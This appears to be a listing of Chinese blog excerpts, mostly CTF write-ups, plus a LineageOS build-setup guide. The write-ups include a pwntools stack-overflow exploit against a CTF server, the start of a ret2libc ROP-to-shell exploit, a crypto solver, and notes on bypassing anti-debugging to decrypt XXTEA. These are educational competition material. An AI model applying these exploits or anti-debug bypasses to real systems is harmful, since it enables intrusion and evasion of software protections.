PWNHello_world​​ 开了pie ​​ 存在后面函数 ​​ func1足够栈溢出 由于pie的原因，多发几次即可获得flag 12345678910111213from pwn import *e = ELF("D:\\CTF\\GH\\attachment")s = remote("node2.anna.nssctf.cn", 28170)payload = b'1' * 40 + b'\xC5\x09'print(payload)s.send(payload)s.interactive() ret2libc1​​ ​​ shop中发现溢出点，要到达溢出点要获取足够金币 ​​ 借助这个函数获取金币 puts泄露libc基地址，rop获取shell 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748from pwn import *libc = ELF("D:\ ...

easymath​Ai大法(doge) 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849from sympy import symbols, solve# 定义变量x = symbols('x')# 多项式系数coeff_2 = 15264966144147258587171776703005926730518438603688487721465coeff_1 = 76513250180666948190254989703768338299723386154619468700730085586057638716434556720233473454400881002065319569292923N = 1254409395263439494940221135524142755604442523784830727291565991437467412585324316649386773303194497896653521043526206585 ...

week2的题更加难绷啊,感觉大脑被论剑了（呜呜呜 RESignin​主要是过掉反调试 1.xxtea加密的key由一段程序的硬编码计算而来 ​​ 而软件断点的原理是用一条软件断点指令替代断点地址所在位置的操作码字节，也就是说通过软件断点得到的key是错误的 2.硬件断点的检测 ​​ 这里的qword_1400BB880即为delta,Dr寄存器是调试寄存器，储存我们的硬件断点，也就是说delta为0时才是正常状态 过掉反调试，标准xxtea，直接解密即可 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667#include <stdio.h>#include <stdlib.h>#include <stdint.h>#define delta 0#define DELTA 0#define MX (((z>>5^y<<2) + ...

ShapeShifter499/LG_v30-LineageOS_Manifest: Manifest needed to help build LineageOS for the LG v30 编译环境搭建配置ubuntu 2204 ​​ 仅作示例，硬盘给300g差不多够 配置代理​​ 我是nat模式，用第三个 ​​ 终端代理设置 将下面加入环境变量 ​​ 依赖安装123$ sudo update-alternatives --config java$ sudo apt-get install bc bison build-essential ccache curl flex g++-multilib gcc-multilib git gnupg gperf imagemagick lib32ncurses5-dev lib32readline-dev lib32z1-dev liblz4-tool libncurses5-dev libsdl1.2-dev libssl-dev libwxgtk3.0-gtk3-dev libxml2 libxml2-utils lzop ...